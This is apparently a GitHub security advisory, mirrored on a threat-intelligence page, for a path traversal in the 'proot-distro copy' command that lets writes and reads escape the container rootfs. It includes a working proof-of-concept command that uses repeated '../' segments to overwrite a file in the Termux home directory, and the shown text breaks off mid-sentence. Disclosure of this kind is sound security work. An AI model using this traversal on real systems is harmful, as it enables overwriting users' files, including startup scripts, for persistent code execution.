mediumCVSS 6.6Vulnerability

GHSA-mfr4-mq8w-vmg6

<html><head></head><body><h1>Path Traversal in <code>proot-distro copy</code> — Arbitrary Read, Write, and Persistent Code Execution Outside Container Rootfs</h1> <h2>Repository</h2> <p>https://github.com/termux/proot-distro</p> <p><strong>Maintainer:</strong> @sylirre</p> <hr> <h2>Affected Component</h2> <ul> <li><strong>Package:</strong> proot-distro</li> <li><strong>Affected command:</strong> <code>copy</code></li> <li><strong>Attack surface:</strong> Host-side Termux CLI — this is not a guest distro shell issue</li> <li><strong>Vulnerability type:</strong> Path Traversal (CWE-22)</li> </ul> <hr> <h2>Affected Versions</h2> Component | Version -- | -- proot-distro | 4.38.0 (initially discovered), 5.0.2 (confirmed still affected — tested on 2026-05-19) Test distro | Ubuntu 25.10 "Questing Quokka" (ubuntu alias) Architecture | aarch64 Device | Samsung A23 Package source | https://packages-cf.termux.dev/apt/termux-main stable/main aarch64 <hr> <h2>Proof of Concept</h2> <p>All tests were performed using only self-owned files and harmless marker data. No root was used. No third-party data was involved. The <code>.bashrc</code> overwritten during testing was immediately restored.</p> <h3>Step 1 — Setup</h3> <pre><code>rm -rf ~/poc mkdir -p ~/poc </code></pre> <hr> <h3>Step 2 — Arbitrary write (overwrite a file outside the container rootfs)</h3> <pre><code>echo "ORIGINAL" &gt; ~/poc/target.txt echo "PWNED_BY_PROOT_DISTRO" &gt; ~/poc/evil.txt proot-distro copy \ ~/poc/evil.txt \ "ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/poc/target.txt" </code></pre> <p>Observed output:</p> <pre><code>[*] Source: '/data/data/com.termux/files/home/poc/evil.txt' [*] Destination: '/data/data/com.termux/files/home/poc/target.txt' [*] Copying files, this may take a while... [*] Finished copying files. </code></pre> <p>Verification:</p> <pre><code>cat ~/poc/target.txt → PWNED_BY_PROOT_DISTRO </code></pre> <p>This confirms that the destination resolved to a path o

Properties

ghsa_id
GHSA-mfr4-mq8w-vmg6
severity
medium
summary
PRoot-Distro has Path Traversal in proot-distro copy — Arbitrary Read, Write, and Persistent Code Execution Outside Container Rootfs
cvss_score
6.6
cve_id
GHSA-mfr4-mq8w-vmg6
cvss_vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
is_ghsa_only
true
ghsa_published
2026-07-17T20:25:37Z
source_url
https://github.com/advisories/GHSA-mfr4-mq8w-vmg6
ghsa_updated
2026-07-17T20:25:38Z

Related Entities (4)

HAS_WEAKNESS (1)

[Weakness]Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

VULNERABLE_TO (1)

[Software]pip/proot-distro

AFFECTS (1)

[Software]pip/proot-distro

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

GHSA-mfr4-mq8w-vmg6 (CVSS 6.6) — Ninja Signal Threat Intelligence | Ninja Signal